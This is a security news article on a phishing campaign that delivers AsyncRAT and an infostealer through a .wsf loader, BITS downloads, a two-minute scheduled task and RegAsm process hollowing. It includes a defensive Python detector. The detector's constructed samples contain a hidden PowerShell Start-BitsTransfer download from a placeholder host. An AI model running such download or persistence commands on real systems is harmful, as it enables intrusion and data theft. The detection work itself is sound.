Evasive Phishing Campaign Delivers AsyncRAT and Infostealer
Researchers at eSentire's Threat Response Unit (TRU) have documented a phishing campaign that delivers the AsyncRAT remote access trojan (RAT) together with an infostealer plugin. Rather than a single exploit, the chain strings together scripted downloaders, file-type masquerading and legitimate Windows components (BITS, PowerShell, RegAsm.exe) to slip past defenses and gain a foothold on the victim's machine.
The chain starts with a phishing email carrying a malicious archive. Inside is a Windows Script File (.wsf) dressed up to look harmless; when the recipient runs it, it fetches an obfuscated VBScript, served from a remote server as a .txt file, and executes it.
That VBScript in turn invokes PowerShell to download a ZIP archive masquerading as an image and extract it. The extracted contents, further scripts and executables, work together to install AsyncRAT and the infostealer plugin and keep them running on the compromised host.
Key steps in the infection chain include:
- Downloading and Extracting Malicious Files: The VBScript calls PowerShell's Start-BitsTransfer cmdlet, a legitimate client for the Background Intelligent Transfer Service (BITS), to fetch a file carrying an image extension. The file is actually a ZIP archive; it is saved as one and extracted into the Public directory on the compromised system. Pulling the payload over BITS rather than a direct web request blends the download in with routine Windows update and sync traffic.
- Executing Malicious Scripts: The extracted files include further VBScript and batch files, launched in a hidden window so that no console appears to alert the user.
- Establishing Persistence: A PowerShell script registers a scheduled task named “MicrosoftEdgeUpdate500”, a name modelled on the legitimate Microsoft Edge updater, that re-runs the malicious code every two minutes. The short interval relaunches the implant almost immediately if it is killed, and the task survives reboots, which is what gives the attacker durable control of the system.
- Process Hollowing: In the final stage the AsyncRAT payload is injected via process hollowing into RegAsm.exe, the .NET Framework Assembly Registration Tool. Because RegAsm.exe is a signed Microsoft binary, a process list or image-based allowlist shows a legitimate program; only the process's memory contents betray the implant.
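The steps above leave a recognisable trail in standard Windows telemetry, and a defender can correlate them rather than chasing each artifact in isolation. The following is an added example written for this article, not code from eSentire's report or from the malware: it maps two kinds of records to the stages of the chain, process-creation records (the Image, ParentImage and CommandLine fields a Sysmon Event ID 1 or Security 4688 pipeline yields) and Security Event ID 4698 "A scheduled task was created" records, whose TaskContent field holds the Task Scheduler XML. The task name and the two-minute repetition come from the report; everything else is this example's assumption, namely the placeholder file names (invoice.wsf, img.png, run.bat, update.vbs), the example.invalid URL, the five-minute repetition and three-stage alert thresholds, and the heuristic that RegAsm.exe spawned by a script host with no arguments is a likely hollowing target. All sample records are constructed.

```python
"""Map Windows telemetry to the stages of the loader chain described above.
Handles process-creation records (Sysmon ID 1 / Security 4688 fields) and
Security 4698 scheduled-task records. All sample records are constructed for
this example; file names and the URL are placeholders, not report indicators."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
KNOWN_TASK_NAMES = {"microsoftedgeupdate500"}  # task name reported by eSentire TRU
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
IMAGE_EXT = re.compile(r"\.(png|jpe?g|gif|bmp)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\users\\public\\|\\appdata\\|\\temp\\", re.IGNORECASE)
ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def basename(path):
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def duration_minutes(text):
    """ISO 8601 duration as used in Task Scheduler XML (e.g. PT2M) -> minutes, or None."""
    m = ISO_DURATION.match(text.strip())
    if not m:
        return None
    d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def arguments_only(cmdline):
    """Strip the (possibly quoted) executable token, leaving only the arguments."""
    return re.sub(r'^\s*(?:"[^"]*"|\S+)\s*', "", cmdline)


def classify_process(rec):
    """Return the chain stage a process-creation record matches, or None."""
    image, parent, cmd = basename(rec["Image"]), basename(rec["ParentImage"]), rec["CommandLine"]
    if image == "wscript.exe" and re.search(r"\.wsf\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        return "1-wsf-loader"                      # archive member run by the victim
    if (image == "powershell.exe" and parent in ("wscript.exe", "cscript.exe")
            and "start-bitstransfer" in cmd.lower() and IMAGE_EXT.search(cmd)):
        return "2-bits-download-image-masquerade"  # BITS pull of a "picture" that is really a ZIP
    if image in SCRIPT_HOSTS and parent in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
        return "3-dropped-script-execution"        # extracted .vbs/.bat run by another script host
    if image == "regasm.exe" and parent in SCRIPT_HOSTS and not arguments_only(cmd).strip():
        # Heuristic (this example's assumption): legitimate RegAsm registers an assembly named
        # on its command line; a script host spawning it with no arguments fits a hollowing target.
        return "5-regasm-hollowing-host"
    return None


def classify_task(rec):
    """Return the persistence stage if a 4698 record matches, or None."""
    root = ET.fromstring(rec["TaskContent"])
    name = basename(rec["TaskName"])
    intervals = [duration_minutes(i.text or "") for i in root.findall(".//t:Repetition/t:Interval", TASK_NS)]
    fast = any(m is not None and m <= 5 for m in intervals)  # 5-minute threshold is this example's choice
    actions = [f'{e.findtext("t:Command", "", TASK_NS)} {e.findtext("t:Arguments", "", TASK_NS)}'
               for e in root.findall(".//t:Exec", TASK_NS)]
    if name in KNOWN_TASK_NAMES or (fast and any(USER_WRITABLE.search(a) for a in actions)):
        return "4-scheduled-task-persistence"
    return None


def reconstruct_chain(records):
    """Sorted list of distinct chain stages observed across a batch of records."""
    stages = {classify_task(r) if r["kind"] == "task" else classify_process(r) for r in records}
    stages.discard(None)
    return sorted(stages)


def looks_like_asyncrat_loader(records, min_stages=3):
    """Alert once enough independent stages line up (threshold is this example's choice)."""
    return len(reconstruct_chain(records)) >= min_stages


# Constructed Task Scheduler XML: two-minute repetition running a placeholder VBScript from Public.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT2M</Interval></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>wscript.exe</Command>
    <Arguments>//B C:\Users\Public\update.vbs</Arguments></Exec></Actions>
</Task>"""
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

SAMPLE_RECORDS = [  # constructed timeline with placeholder file names
    {"kind": "process", "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice.wsf"'},
    {"kind": "process", "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'powershell -w hidden -c "Start-BitsTransfer -Source http://example.invalid/img.png -Destination C:\Users\Public\img.png"'},
    {"kind": "process", "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\Public\run.bat"'},
    {"kind": "task", "TaskName": r"\MicrosoftEdgeUpdate500", "TaskContent": TASK_XML},
    {"kind": "process", "Image": REGASM, "ParentImage": PS, "CommandLine": f'"{REGASM}"'},
]
# Benign control: an installer registering a COM-visible assembly the normal way.
BENIGN_REGASM = {"kind": "process", "Image": REGASM, "ParentImage": r"C:\Windows\System32\msiexec.exe",
                 "CommandLine": f'"{REGASM}" "C:\\Program Files\\Vendor\\Interop.dll" /codebase'}
```

Running reconstruct_chain(SAMPLE_RECORDS) returns all five stages in order, while the benign RegAsm record, launched by msiexec with an assembly path on its command line, matches nothing. Any single stage is weak evidence on its own (BITS downloads and RegAsm invocations are routine), which is why the alert in looks_like_asyncrat_loader requires several stages to line up; the known task name is the one indicator strong enough to fire on alone.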
Once installed, AsyncRAT opens a backdoor through which the attackers control the machine remotely. This variant goes further: it ships with an infostealer plugin that significantly amplifies the threat.
The plugin harvests sensitive data from popular browsers, including Chrome, Firefox, Opera and Edge. It specifically targets cryptocurrency-wallet extensions such as MetaMask, Phantom and Binance, as well as two-factor authentication (2FA) extensions, so that accounts protected by a second factor are still at risk once the browser profile is looted. Remote control plus data theft gives the operators a dual capability: a foothold on the system and the credentials to monetize it.
eSentire’s TRU stresses that phishing remains the entry point and urges users to treat unsolicited messages, and especially their attachments, with caution. Keeping endpoint security software up to date and deploying robust email filtering remain the primary mitigations. Defenders can also hunt for the artifacts described above: scheduled tasks that repeat every few minutes, BITS transfers of image-named files that are then extracted as archives, and RegAsm.exe launched by a script host or PowerShell rather than by an installer.